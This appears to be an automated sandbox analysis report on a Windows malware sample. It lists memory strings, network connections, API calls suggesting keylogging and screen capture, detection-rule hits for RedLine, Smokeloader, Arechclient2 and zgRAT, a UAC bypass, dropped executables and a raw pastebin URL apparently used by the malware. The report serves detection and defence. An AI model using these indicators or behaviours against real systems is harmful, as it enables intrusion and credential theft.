Source: svchost.exe, 00000014.00000003.2384912240.00000262C1123000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000014.00000003.2384912240.00000262C10B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000007.00000002.2106716298.0000000005146000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.2106716298.0000000005582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000007.00000002.2128872923.0000000006057000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003041000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/z9pYkqPQ
Source: i1.exe, 00000006.00000003.2342660108.00000000074B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: u2xs.0.exe, 00000008.00000003.2483945937.00000000309C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: u2xs.0.exe, 00000008.00000003.2483945937.00000000309C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: i1.exe, 00000006.00000003.2342660108.00000000074B2000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000B.00000002.2396139985.0000000004223000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.2649003331.0000000004F92000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000048.00000002.2693112601.000000000335E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: u2xs.0.exe, 00000008.00000003.2253436670.0000000004307000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: u2xs.0.exe, 00000008.00000003.2253436670.0000000004307000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: u2xs.0.exe, 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: u2xs.0.exe, 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://www.mozilla.org/about/dHh0
Source: u2xs.0.exe, 00000008.00000003.2483945937.00000000309C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: u2xs.0.exe, 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: u2xs.0.exe, 00000008.00000003.2483945937.00000000309C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: u2xs.0.exe, 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: u2xs.0.exe, 00000008.00000003.2483945937.00000000309C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: u2xs.0.exe, 00000008.00000003.2483945937.00000000309C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: u2xs.0.exe, 00000008.00000003.2483945937.00000000309C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: u2xs.0.exe, 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: u2xs.0.exe, 00000008.00000003.2483945937.00000000309C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: u2xs.0.exe, 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 108.157.172.96:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.157.172.96:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.157.172.96:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.157.172.96:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.157.172.96:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.130.41.108:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 37.221.125.202:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 156.146.43.65:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.80.150.121:443 -> 192.168.2.5:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.80.150.121:443 -> 192.168.2.5:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.64.193:443 -> 192.168.2.5:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.64.193:443 -> 192.168.2.5:49775 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040571B

Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe

Code function: 11_2_00C7C8B0 GetClientRect,GetDC,CreateCompatibleBitmap,GetDC,CreateCompatibleDC,BitBlt,

11_2_00C7C8B0

Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe

Code function: 11_2_68AEA5AA GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,

11_2_68AEA5AA

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.run.exe.426ed5b.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.cmd.exe.4fdce64.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.cmd.exe.58700c8.8.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 72.2.run.exe.336586d.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 72.2.run.exe.33a915b.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.cmd.exe.4fdc264.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.cmd.exe.58700c8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 72.2.run.exe.33a9d5b.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.cmd.exe.4f98976.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 69.2.MSBuild.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 11.2.run.exe.426e15b.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.run.exe.422a86d.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000006.00000002.2693695310.0000000004095000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000002.2983285998.0000000004265000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000008.00000002.2972613592.0000000004180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\AppData\Local\Temp\wygmbcpqogng, type: DROPPED	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT157D.tmp, type: DROPPED	Matched rule: Detects zgRAT Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\i1.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\i3.exe			Jump to dropped file

Very long command line found

Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: Commandline size = 3796
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: Commandline size = 3796

Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C7B8C0 rand_s,NtQueryVirtualMemory,	8_2_68C7B8C0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C7B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	8_2_68C7B910
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C1F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	8_2_68C1F280
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C7B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	8_2_68C7B700

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403532

Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	File created: C:\Windows\Tasks\biPxHmULFllsbMgnpt.job
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	File created: C:\Windows\system32\GroupPolicy\Adm
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	File created: C:\Windows\system32\GroupPolicy\Machine
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	File created: C:\Windows\system32\GroupPolicy\User
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	File created: C:\Windows\system32\GroupPolicy\Machine\Registry.pol
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	File created: C:\Windows\system32\GroupPolicy\gpt.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell

Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe

File deleted: C:\Windows\SysWOW64\GroupPolicyikHEP

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406DC6	0_2_00406DC6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040759D	0_2_0040759D
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_00427880	6_2_00427880
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_0040B8AE	6_2_0040B8AE
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_0040C191	6_2_0040C191
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_004051B4	6_2_004051B4
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_004123A0	6_2_004123A0
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_0040F441	6_2_0040F441
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_0040C44C	6_2_0040C44C
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_0042140C	6_2_0042140C
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_0040BC20	6_2_0040BC20
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_0041BE39	6_2_0041BE39
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_0040BECA	6_2_0040BECA
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_00408761	6_2_00408761
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_0041B722	6_2_0041B722
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_0040C7FC	6_2_0040C7FC
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05C9BE87	6_2_05C9BE87
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05C9F6A8	6_2_05C9F6A8
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05C9C6B3	6_2_05C9C6B3
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05CA2607	6_2_05CA2607
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05C989C8	6_2_05C989C8
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05CAB989	6_2_05CAB989
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05C9C131	6_2_05C9C131
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05C9C3F8	6_2_05C9C3F8
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05C9BB15	6_2_05C9BB15
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05CB7AE7	6_2_05CB7AE7
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05C9CA63	6_2_05C9CA63
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C135A0	8_2_68C135A0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C850C7	8_2_68C850C7
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C3C0E0	8_2_68C3C0E0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C558E0	8_2_68C558E0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C460A0	8_2_68C460A0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C38850	8_2_68C38850
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C3D850	8_2_68C3D850
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C5F070	8_2_68C5F070
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C27810	8_2_68C27810
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C5B820	8_2_68C5B820
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C64820	8_2_68C64820
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C55190	8_2_68C55190
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C72990	8_2_68C72990
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C1C9A0	8_2_68C1C9A0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C4D9B0	8_2_68C4D9B0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C3A940	8_2_68C3A940
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C2D960	8_2_68C2D960
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C6B970	8_2_68C6B970
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C8B170	8_2_68C8B170
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C58AC0	8_2_68C58AC0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C31AF0	8_2_68C31AF0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C5E2F0	8_2_68C5E2F0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C8BA90	8_2_68C8BA90
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C122A0	8_2_68C122A0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C44AA0	8_2_68C44AA0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C2CAB0	8_2_68C2CAB0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C82AB0	8_2_68C82AB0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C59A60	8_2_68C59A60
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C853C8	8_2_68C853C8
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C1F380	8_2_68C1F380
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C15340	8_2_68C15340
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C2C370	8_2_68C2C370
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C5D320	8_2_68C5D320
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C264C0	8_2_68C264C0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C3D4D0	8_2_68C3D4D0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C1D4E0	8_2_68C1D4E0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C56CF0	8_2_68C56CF0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C26C80	8_2_68C26C80
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C734A0	8_2_68C734A0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C7C4A0	8_2_68C7C4A0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C25440	8_2_68C25440
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C8545C	8_2_68C8545C
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C8AC00	8_2_68C8AC00
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C55C10	8_2_68C55C10
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C62C10	8_2_68C62C10
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C8542B	8_2_68C8542B
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C50DD0	8_2_68C50DD0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C785F0	8_2_68C785F0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C2FD00	8_2_68C2FD00
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C3ED10	8_2_68C3ED10
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C40512	8_2_68C40512
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C876E3	8_2_68C876E3
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C1BEF0	8_2_68C1BEF0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C2FEF0	8_2_68C2FEF0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C7E680	8_2_68C7E680
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C35E90	8_2_68C35E90
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C74EA0	8_2_68C74EA0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C34640	8_2_68C34640
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C62E4E	8_2_68C62E4E
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C39E50	8_2_68C39E50
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C53E50	8_2_68C53E50
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C86E63	8_2_68C86E63
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C1C670	8_2_68C1C670
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C65600	8_2_68C65600
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C57E10	8_2_68C57E10
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C79E30	8_2_68C79E30
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C1DFE0	8_2_68C1DFE0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C46FF0	8_2_68C46FF0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C677A0	8_2_68C677A0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C29F00	8_2_68C29F00
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C57710	8_2_68C57710
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68DC68E0	8_2_68DC68E0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68D94840	8_2_68D94840
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68D10820	8_2_68D10820
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68D4A820	8_2_68D4A820
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68DDC9E0	8_2_68DDC9E0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68CF49F0	8_2_68CF49F0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68D809B0	8_2_68D809B0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68D509A0	8_2_68D509A0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68D7A9A0	8_2_68D7A9A0
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68CF8960	8_2_68CF8960
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68D16900	8_2_68D16900
